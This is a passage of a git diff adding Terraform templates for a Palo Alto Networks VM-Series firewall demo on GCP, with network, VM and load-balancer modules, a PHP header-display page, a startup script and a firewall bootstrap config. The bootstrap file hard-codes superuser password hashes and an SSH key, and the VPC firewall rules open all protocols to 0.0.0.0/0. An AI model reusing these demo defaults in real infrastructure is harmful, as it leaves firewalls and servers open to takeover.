+  boot_disk {
+    initialize_params {
+      image = var.image
+    }
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+}
+
+
+resource "google_compute_instance_group" "default" {
+  count     = var.create_instance_group ? length(var.names) : 0
+  name      = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+  zone      = element(var.zones, count.index)
+  instances = [google_compute_instance.default[count.index].self_link]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf
new file mode 100644
index 00000000..3e4c700a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf
@@ -0,0 +1,11 @@
+output vm_names {
+  value = google_compute_instance.default.*.name
+}
+
+output vm_self_link {
+  value = google_compute_instance.default.*.self_link
+}
+
+output instance_group {
+  value = google_compute_instance_group.default.*.self_link
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf
new file mode 100644
index 00000000..03fa3cac
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf
@@ -0,0 +1,43 @@
+variable names {
+  type = list(string)
+}
+
+variable machine_type {
+}
+variable create_instance_group {
+  type    = bool
+  default = false
+}
+
+variable instance_group_names {
+  type    = list(string)
+  default = ["vmseries-instance-group"]
+}
+variable zones {
+  type = list(string)
+}
+variable ssh_key {
+  default = ""
+}
+variable image {
+}
+
+variable subnetworks {
+  type = list(string)
+}
+
+variable scopes {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable startup_script {
+  default = ""
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf
new file mode 100644
index 00000000..c74ee4fa
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf
@@ -0,0 +1,83 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+resource "google_compute_instance" "vmseries" {
+  count                     = length(var.names)
+  name                      = element(var.names, count.index)
+  machine_type              = var.machine_type
+  zone                      = element(var.zones, count.index)
+  min_cpu_platform          = var.cpu_platform
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = var.tags
+
+  metadata = {
+    mgmt-interface-swap                  = var.mgmt_interface_swap
+    vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+    serial-port-enable                   = true
+    ssh-keys                             = var.ssh_key
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+
+  network_interface {
+
+    dynamic "access_config" {
+      for_each = var.nic0_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic0_ip, count.index)
+    subnetwork = var.subnetworks[0]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic1_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic1_ip, count.index)
+    subnetwork = var.subnetworks[1]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic2_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic2_ip, count.index)
+    subnetwork = var.subnetworks[2]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = var.image
+      type  = var.disk_type
+    }
+  }
+
+  depends_on = [
+    null_resource.dependency_getter
+  ]
+}
+
+resource "google_compute_instance_group" "vmseries" {
+  count     = var.create_instance_group ? length(var.names) : 0
+  name      = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+  zone      = element(var.zones, count.index)
+  instances = [google_compute_instance.vmseries[count.index].self_link]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..21b040a5
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf
@@ -0,0 +1,24 @@
+output vm_names {
+  value = google_compute_instance.vmseries.*.name
+}
+
+output vm_self_link {
+  value = google_compute_instance.vmseries.*.self_link
+}
+
+output instance_group {
+  value = google_compute_instance_group.vmseries.*.self_link
+}
+
+output nic0_public_ip {
+  value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
+}
+
+output nic1_public_ip {
+  value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
+}
+
+output nic2_public_ip {
+  value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf
new file mode 100644
index 00000000..9eaae5c9
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf
@@ -0,0 +1,102 @@
+variable subnetworks {
+  type = list(string)
+}
+
+variable names {
+  type = list(string)
+}
+
+variable machine_type {
+}
+
+variable zones {
+  type = list(string)
+}
+
+variable cpu_platform {
+  default = "Intel Broadwell"
+}
+variable disk_type {
+  default = "pd-ssd"
+  #default = "pd-standard"
+}
+variable bootstrap_bucket {
+  default = ""
+}
+
+variable ssh_key {
+  default = ""
+}
+
+variable public_lb_create {
+  default = false
+}
+
+variable scopes {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/compute.readonly",
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable image {
+}
+
+variable tags {
+  type    = list(string)
+  default = []
+}
+
+variable create_instance_group {
+  type    = bool
+  default = false
+}
+
+variable instance_group_names {
+  type    = list(string)
+  default = ["vmseries-instance-group"]
+}
+
+variable dependencies {
+  type    = list(string)
+  default = []
+}
+
+variable nic0_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic1_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable nic2_ip {
+  type    = list(string)
+  default = [""]
+}
+
+variable mgmt_interface_swap {
+  default = ""
+}
+
+variable nic0_public_ip {
+  type    = bool
+  default = false
+}
+
+variable nic1_public_ip {
+  type    = bool
+  default = false
+}
+
+variable nic2_public_ip {
+  type    = bool
+  default = false
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf
new file mode 100644
index 00000000..0c614e1d
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf
@@ -0,0 +1,27 @@
+resource "google_compute_network" "default" {
+  name                            = var.vpc
+  delete_default_routes_on_create = var.delete_default_route
+  auto_create_subnetworks         = false
+}
+
+resource "google_compute_subnetwork" "default" {
+  count         = length(var.subnets)
+  name          = element(var.subnets, count.index)
+  ip_cidr_range = element(var.cidrs, count.index)
+  region        = element(var.regions, count.index)
+  network       = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+  count         = length(var.allowed_sources) != 0 ? 1 : 0
+  name          = "${google_compute_network.default.name}-ingress"
+  network       = google_compute_network.default.self_link
+  direction     = "INGRESS"
+  source_ranges = var.allowed_sources
+
+  allow {
+    protocol = var.allowed_protocol
+    ports    = var.allowed_ports
+  }
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf
new file mode 100644
index 00000000..3d64c11b
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf
@@ -0,0 +1,24 @@
+output subnetwork_id {
+  value = google_compute_subnetwork.default.*.id
+}
+
+output subnetwork_name {
+  value = google_compute_subnetwork.default.*.name
+}
+
+output subnetwork_self_link {
+  value = google_compute_subnetwork.default.*.self_link
+}
+
+output vpc_name {
+  value = google_compute_network.default.*.name
+}
+
+output vpc_id {
+  value = google_compute_network.default.*.id[0]
+}
+
+output vpc_self_link {
+  value = google_compute_network.default.*.self_link[0]
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf
new file mode 100644
index 00000000..0f16be02
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf
@@ -0,0 +1,33 @@
+variable vpc {
+}
+
+variable subnets {
+  type = list(string)
+}
+
+variable cidrs {
+  type = list(string)
+}
+
+variable regions {
+  type = list(string)
+}
+
+variable allowed_sources {
+  type    = list(string)
+  default = []
+}
+
+variable allowed_protocol {
+  default = "all"
+}
+
+variable allowed_ports {
+  type    = list(string)
+  default = []
+}
+
+variable delete_default_route {
+  default = "false"
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/project.tf b/gcp/adv_peering_2fw_2spoke_common/project.tf
new file mode 100644
index 00000000..375e7eae
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/project.tf
@@ -0,0 +1,18 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+provider "google" {
+  #credentials = var.auth_file
+  project     = var.project_id
+  region      = var.regions[0]
+}
+
+provider "google-beta" {
+  #credentials = var.auth_file
+  project     = var.project_id
+  region      = var.regions[0]
+  version     = "> 3.0.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh
new file mode 100644
index 00000000..f799d23d
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+sleep 120;
+until sudo apt-get update; do echo "Retrying"; sleep 5; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 5; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 5; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 5; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 5; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 5; done
diff --git a/gcp/adv_peering_2fw_2spoke_common/spokes.tf b/gcp/adv_peering_2fw_2spoke_common/spokes.tf
new file mode 100644
index 00000000..f808f011
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/spokes.tf
@@ -0,0 +1,113 @@
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC.
+module "vpc_spoke1" {
+  source               = "./modules/vpc/"
+  vpc                  = var.spoke1_vpc
+  subnets              = var.spoke1_subnets
+  cidrs                = var.spoke1_cidrs
+  regions              = var.regions
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
+module "vm_spoke1" {
+  source = "./modules/vm/"
+  names  = var.spoke1_vms
+  zones = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  subnetworks           = [module.vpc_spoke1.subnetwork_self_link[0]]
+  machine_type          = "f1-micro"
+  image                 = "ubuntu-os-cloud/ubuntu-1604-lts"
+  create_instance_group = true
+  ssh_key               = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+  startup_script        = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+module "ilb_web" {
+  source            = "./modules/lb_tcp_internal/"
+  name              = var.spoke1_ilb
+  subnetworks       = [module.vpc_spoke1.subnetwork_self_link[0]]
+  all_ports         = false
+  ports             = ["80"]
+  health_check_port = "80"
+  ip_address        = var.spoke1_ilb_ip
+ 
+  backends = {
+    "0" = [
+      {
+        group    = module.vm_spoke1.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.vm_spoke1.instance_group[1]
+        failover = false
+      }
+    ]
+  }
+  providers = {
+    google = google-beta
+  }
+}
+
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name                 = "${var.trust_vpc}-to-${var.spoke1_vpc}"
+  provider             = google-beta
+  network              = module.vpc_trust.vpc_self_link
+  peer_network         = module.vpc_spoke1.vpc_self_link
+  export_custom_routes = true
+}
+
+resource "google_compute_network_peering" "spoke1_to_trust" {
+  name                 = "${var.spoke1_vpc}-to-${var.trust_vpc}"
+  provider             = google-beta
+  network              = module.vpc_spoke1.vpc_self_link
+  peer_network         = module.vpc_trust.vpc_self_link
+  import_custom_routes = true
+
+  depends_on = [google_compute_network_peering.trust_to_spoke1]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with VM.  Create peer link with trust VPC.
+module "vpc_spoke2" {
+  source               = "./modules/vpc/"
+  vpc                  = var.spoke2_vpc
+  subnets              = var.spoke2_subnets
+  cidrs                = var.spoke2_cidrs
+  regions              = var.regions
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
+module "vm_spoke2" {
+  source       = "./modules/vm/"
+  names        = var.spoke2_vms
+  zones        = [data.google_compute_zones.available.names[0]]
+  machine_type = "f1-micro"
+  image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  subnetworks  = [module.vpc_spoke2.subnetwork_self_link[0]]
+  ssh_key      = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+  name                 = "${var.trust_vpc}-to-${var.spoke2_vpc}"
+  provider             = google-beta
+  network              = module.vpc_trust.vpc_self_link
+  peer_network         = module.vpc_spoke2.vpc_self_link
+  export_custom_routes = true
+
+  depends_on = [google_compute_network_peering.spoke1_to_trust]
+}
+
+resource "google_compute_network_peering" "spoke2_to_trust" {
+  name                 = "${var.spoke2_vpc}-to-${var.trust_vpc}"
+  provider             = google-beta
+  network              = module.vpc_spoke2.vpc_self_link
+  peer_network         = module.vpc_trust.vpc_self_link
+  import_custom_routes = true
+
+  depends_on = [google_compute_network_peering.trust_to_spoke2]
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars
new file mode 100644
index 00000000..74734aad
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars
@@ -0,0 +1,42 @@
+#project_id      = ""                      # Your project ID for the deployment
+#public_key_path = "~/.ssh/gcp-demo.pub"   # Your SSH Key
+
+#fw_panos        = "byol-904"              # Uncomment for PAN-OS 9.0.4 - BYOL
+#fw_panos        = "bundle1-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#fw_panos        = "bundle2-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+
+#-------------------------------------------------------------------
+regions            = ["us-east4"]
+
+mgmt_vpc          = "mgmt-vpc"
+mgmt_subnet       = ["mgmt"]
+mgmt_cidr         = ["192.168.0.0/24"]
+mgmt_sources      = ["0.0.0.0/0"]
+
+untrust_vpc       = "untrust-vpc"
+untrust_subnet    = ["untrust"]
+untrust_cidr      = ["192.168.1.0/24"]
+
+trust_vpc         = "trust-vpc"
+trust_subnet      = ["trust"]
+trust_cidr        = ["192.168.2.0/24"]
+
+spoke1_vpc        = "spoke1-vpc"
+spoke1_subnets    = ["spoke1-subnet1"]
+spoke1_cidrs      = ["10.1.0.0/24"]
+spoke1_vms        = ["spoke1-vm1", "spoke1-vm2"]
+spoke1_ilb        = "spoke1-intlb"
+spoke1_ilb_ip     = "10.1.0.100"
+
+spoke2_vpc        = "spoke2-vpc"
+spoke2_subnets    = ["spoke2-subnet1"]
+spoke2_cidrs      = ["10.2.0.0/24"]
+spoke2_vms        = ["spoke2-vm1"]
+spoke_user        = "demo"
+
+fw_names_common  = ["vmseries01", "vmseries02"]
+fw_machine_type   = "n1-standard-4"
+
+extlb_name          = "vmseries-extlb"
+intlb_name          = "vmseries-intlb"
diff --git a/gcp/adv_peering_2fw_2spoke_common/variables.tf b/gcp/adv_peering_2fw_2spoke_common/variables.tf
new file mode 100644
index 00000000..a33106a5
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/variables.tf
@@ -0,0 +1,113 @@
+variable project_id {
+  description = "GCP Project ID"
+}
+
+variable auth_file {
+  description = "GCP Project auth file"
+  default     = ""
+}
+
+variable regions {
+}
+
+variable fw_panos {
+  description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable fw_image {
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable fw_names_common {
+  type = list(string)
+}
+
+variable fw_machine_type {
+}
+
+variable extlb_name {
+}
+
+variable intlb_name {
+}
+
+variable mgmt_vpc {
+}
+
+variable mgmt_subnet {
+  type = list(string)
+}
+
+variable mgmt_cidr {
+  type = list(string)
+}
+
+variable untrust_vpc {
+}
+
+variable untrust_subnet {
+  type = list(string)
+}
+
+variable untrust_cidr {
+  type = list(string)
+}
+
+variable trust_vpc {
+}
+
+variable trust_subnet {
+  type = list(string)
+}
+
+variable trust_cidr {
+  type = list(string)
+}
+
+variable mgmt_sources {
+  type = list(string)
+}
+
+variable spoke1_vpc {
+}
+
+variable spoke1_subnets {
+  type = list(string)
+}
+
+variable spoke1_cidrs {
+  type = list(string)
+}
+
+variable spoke1_vms {
+  type = list(string)
+}
+
+variable spoke1_ilb {
+}
+
+variable spoke1_ilb_ip {
+}
+
+variable spoke2_vpc {
+}
+
+variable spoke2_subnets {
+  type = list(string)
+}
+
+variable spoke2_cidrs {
+  type = list(string)
+}
+
+variable spoke2_vms {
+  type = list(string)
+}
+
+variable spoke_user {
+  description = "SSH user for spoke Linux VM"
+}
+
+variable public_key_path {
+  description = "Local path to public SSH key.  If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
diff --git a/gcp/adv_peering_4fw_2spoke/README.md b/gcp/adv_peering_4fw_2spoke/README.md
new file mode 100644
index 00000000..c07f719e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/README.md
@@ -0,0 +1,40 @@
+## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering / ILBNH
+
+Terraform creates 4 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs.  The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to the internal load balancers.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_4fw_2spoke/guide.pdf) for more information.
+
+### Diagram
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/diagram.png">
+</p>
+
+
+### Prerequistes 
+1. Valid GCP Account
+
+### How To
+Setup Project (all commands are run from Google Cloud Terminal or from local machine with terraform v12.0 installed)
+```
+	$ gcloud services enable compute.googleapis.com
+	$ ssh-keygen -f ~/.ssh/<keyname> -t rsa -C <comment>
+	$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_4fw_2spoke
+```
+
+Run Build
+```
+	# Edit terraform.tfvars to match project ID, SSH Key, and PAN-OS version and license.
+
+	$ terraform init
+	$ terraform apply
+```
+
+Destroy Build
+```
+	$ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
new file mode 100644
index 00000000..e7e275ee
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml
@@ -0,0 +1,898 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$omtpasik$JVuMCKVuxaIHBIkdrbR4k.</phash>
+      </entry>
+      <entry name="admin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.</phash>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <dhcp-client>
+                  <create-default-route>yes</create-default-route>
+                </dhcp-client>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <adjust-tcp-mss>
+                  <enable>yes</enable>
+                </adjust-tcp-mss>
+                <mtu>1460</mtu>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <adjust-tcp-mss>
+                  <enable>yes</enable>
+                </adjust-tcp-mss>
+                <mtu>1460</mtu>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
